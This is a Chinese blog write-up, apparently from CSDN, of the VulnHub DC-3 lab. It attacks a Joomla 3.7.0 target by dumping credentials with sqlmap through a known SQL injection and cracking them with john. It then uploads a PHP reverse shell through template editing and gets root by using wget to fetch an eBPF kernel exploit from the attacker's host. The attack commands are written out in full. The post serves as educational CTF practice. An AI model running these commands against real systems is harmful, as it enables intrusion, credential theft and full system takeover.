鸡汤来咯~~~~
前言:
靶场链接:https://download.vulnhub.com/dc/DC-3-2.zip.torrent
脚本链接:https://pan.baidu.com/s/1iPx2VaagNfwZVYfFHmkuew
提取码:8888
--来自百度网盘超级会员V3的分享
下载导入虚拟机把桥接改成NAT模式,把桥接改成NAT模式,把桥接改成NAT模式重要的事情说三遍!
注:这只是一个靶场只提供参考,勿要真实模拟。
一.信息收集
主机扫描
nmap -sP 192.168.115.0/24
![](https://img-blog.csdnimg.cn/img_convert/1be6e06fa351eb5e91d7707af13ab0f4.png)
nmap扫出目标主机:192.168.115.143,接下来对目标主机进行端口扫描查看开放端口。
端口扫描
nmap -sV -A 192.168.115.143
![](https://img-blog.csdnimg.cn/img_convert/5bd9f151e8fc9b3023657461f1e28a08.png)
开放了80端口,且我们可以看见此靶场用的是Joomla的cms。这里继续进行下一步,开始扫描目录。
目录扫描
dirsearch -u 192.168.115.143 -e * -x 403 --random-agent
![](https://img-blog.csdnimg.cn/img_convert/43675b16e77cc5e611381fc47a9ab39e.png)
我们发现这个页面貌似是一个登录框界面,咱们进行页面探针试试。
web页面探针
![](https://img-blog.csdnimg.cn/img_convert/51543b6cea7b674d03a7e35b690709ca.png)
在目录下的/README.txt目录下还查看到了cms的版本3.7
![](https://img-blog.csdnimg.cn/img_convert/27bd821cbae0c51fb5dcf11273b619d9.png)
二.漏洞查找
joomscan扫描
joomscan是一款开源的且针对joomla的扫描器,kali可以用命令apt install joomscan安装该工具。
joomscan -u 192.168.115.143
![](https://img-blog.csdnimg.cn/img_convert/bf2e730822378f929c44ae4153634c12.png)
扫出joomla版本 3.7.0 以及页面目录下的登录界面。
2.searchsploit搜索
searchsploit是一款搜索漏洞的工具
searchsploit joomla 3.7.0
![](https://img-blog.csdnimg.cn/img_convert/74d1fdddd4a699116eb520edd5190fbd.png)
结果显示joomla3.7.0版本存在SQL注入以及css跨站脚本漏洞。查看SQL注入完整的pant。
![](https://img-blog.csdnimg.cn/img_convert/ef109d1ac846a16bfe6629758a33a76e.png)
这里我已经复制过了,正常是不会显示/root/桌面/xxx.txt.
将文件路径复制到桌面上
cp /usr/share/exploitdb/exploits/php/webapps/42033.txt /root/桌面/42033.txt
![](https://img-blog.csdnimg.cn/img_convert/24af815c758bbf4fb95438ef2517019f.png)
在kali桌面上打开文件,文件给出了SQL注入点以及SQLmap的使用方式。既然给了使用方法,那么就直接用SQLmap跑库吧。~~~吃瓜吃瓜
三.漏洞利用
SQL注入之sqlmap
1.1.跑库名
sqlmap -u "http://192.168.115.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]
![](https://img-blog.csdnimg.cn/img_convert/ca2f116d4ce84bb1091c546f90f37cb3.png)
跑出数据库的5个库名。(这里因为时间原因我就不一个一个跑了,)
1.2.跑指定数据库所有表名
sqlmap -u "http://192.168.115.143/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] --batch -D joomladb –tables
![](https://img-blog.csdnimg.cn/img_convert/99e04bad20b27e3d1c55db4bce7e096a.png)
经过之前的靶场测试经验得出,重要的东西在熟悉的users表里。
1.3.查看user字段内容
sqlmap -u "http://192.168.115.143 /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb
![](https://img-blog.csdnimg.cn/img_convert/ef6575c3f50c72515bf6e0074e5c9dc9.png)
经过前几次的经验得出password和username是用户存放账号和密码的,继续往下查看。
1.4.查看用户密码
sqlmap -u "http://192.168.115.143 /index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomladb -T '#__users' -C username,password –dump
![](https://img-blog.csdnimg.cn/img_convert/5a173c5a5396a66f7bab2f9e8dfa062a.png)
可看出密码进行过哈希加密,这里我们将密码复制下来存放在一个文件里。
密码爆破
将密码复制到文件夹内。
![](https://img-blog.csdnimg.cn/img_convert/bf8f65d61b23241fc80f40ae4368e238.png)
使用john工具进行解密
![](https://img-blog.csdnimg.cn/img_convert/d7a7d723aff5522e9fa3bf92ed48b290.png)
得出密码:snoopy
知道了账号密码进行尝试登录.
![](https://img-blog.csdnimg.cn/img_convert/9098cf91e88fefa106c3a8645d5af0cc.png)
成功进入后台。
反弹shell
![](https://img-blog.csdnimg.cn/img_convert/e1b43c58de069abeddb3081f11d6d3cd.png)
![](https://img-blog.csdnimg.cn/img_convert/fa0a6cc4bef484f0049542e15bf13b32.png)
![](https://img-blog.csdnimg.cn/img_convert/79771ea55673cafee78db71e2c6f70ba.png)
![](https://img-blog.csdnimg.cn/img_convert/dc18cdd8796d75c6f9489c629f236a64.png)
根据图片显示,我们找到了一个文件上传漏洞,在这个界面可以新建文件,这里我们上传php脚本用kali进行监听进行反弹shell。
![](https://img-blog.csdnimg.cn/img_convert/46f7e068d5ff26363c33a57717db58d1.png)
脚本写好之后点击保存。在kali进行监听(图片显示的IP地址是kali地址,不要写错了哦)
![](https://img-blog.csdnimg.cn/img_convert/7bba36039c84469182abeee2e85d820f.png)
设置好监听后,我们在网页访问刚刚写的脚本文件,
ip地址/templates/beez3/shell.php
![](https://img-blog.csdnimg.cn/img_convert/f0b592ad696136aecdf25e519b14c055.png)
监听成功。~~~吃瓜吃瓜
四.提权
这里我们发现不管干什么都受权限限制,因为这里不能用suid和git提权。试试查看一下其他的能看的信息。
查看操作系统
tac /etc/issue
cat /proc/version
![](https://img-blog.csdnimg.cn/img_convert/25aceb8e41c3d64f1781fde88640255b.png)
得出了操作系统以及版本信息,接下来我们可以用这些信息用searchsploit进行搜索相关可利用漏洞。
搜索操作系统与其版本信息
searchsploit Ubuntu 16.04
![](https://img-blog.csdnimg.cn/img_convert/1c21f2f04596d04557dde9ebd14ed915.png)
Privilege Escalation(提权),这里我们使用通用4.4.x版本的提权方式。
3.下载脚本
利用cp命令拷贝到桌面。
cp /usr/share/exploitdb/exploits/linux/local/39772.txt /root/桌面/39772.txt
![](https://img-blog.csdnimg.cn/img_convert/1be2132ec474b80c817f1715285bc097.png)
![](https://img-blog.csdnimg.cn/img_convert/f214b888bb1c6c0bb44ca3e723148649.png)
打开该文件,在文件的末尾段 它提示我们去github上下载一个压缩包,这里我们去GitHub上下载发现文件已经过期了,我们可以去网上找出这个文件下载到自己的电脑上,这里我将它放在了kali里的/var/www/html目录下。
![](https://img-blog.csdnimg.cn/img_convert/ae67bbe5dac4baf2dc4b0cf0d94ed3f5.png)
这里我已经将它解压过了。
回到目标靶机,利用wget命令将39772目录下的exploit.tar压缩脚本文件下载到目标靶机中。
wget http://192.168.115.141/39772/39772/exploit.tar
![](https://img-blog.csdnimg.cn/img_convert/59fe24c6ac50ec0558793268a2f9e9e0.png)
下载后利用tar -xvf对脚本文件进行解压
tar -xvf exploit.tar
![](https://img-blog.csdnimg.cn/img_convert/5595204a8d6ab415116fb31f67fd0917.png)
4.脚本利用
接着cd进入解压后的文件夹
cd ebpf_mapfd_doubleput_explot
![](https://img-blog.csdnimg.cn/img_convert/38552a6d2264be85269afc849a6961e0.png)
![](https://img-blog.csdnimg.cn/img_convert/7a0eb08b295cefc646ef6af9904bd01a.png)
文件告诉你如何执行,linux下.(点)代表执行某个文件的意思。
./compile.sh
./doubleput
![](https://img-blog.csdnimg.cn/img_convert/908499b299d2442635376496c2a61de2.png)
5.拿下flag
过程可能会有点慢
执行完脚本权限就直接提升上来了
![](https://img-blog.csdnimg.cn/img_convert/fb029974deec979ac4f7fd394b84cf4d.png)
直接进入root目录,看见了flag,打开->收工->关机->~~~吃瓜
本文到这里就结束了~~睡觉睡觉~~~
(要是本文有不懂的地方或者有错误的地方希望各位在评论区留言,博主会多多改进的。)
![](https://img-blog.csdnimg.cn/img_convert/15092fd8ba2651708ba37f63e03ef79b.jpeg)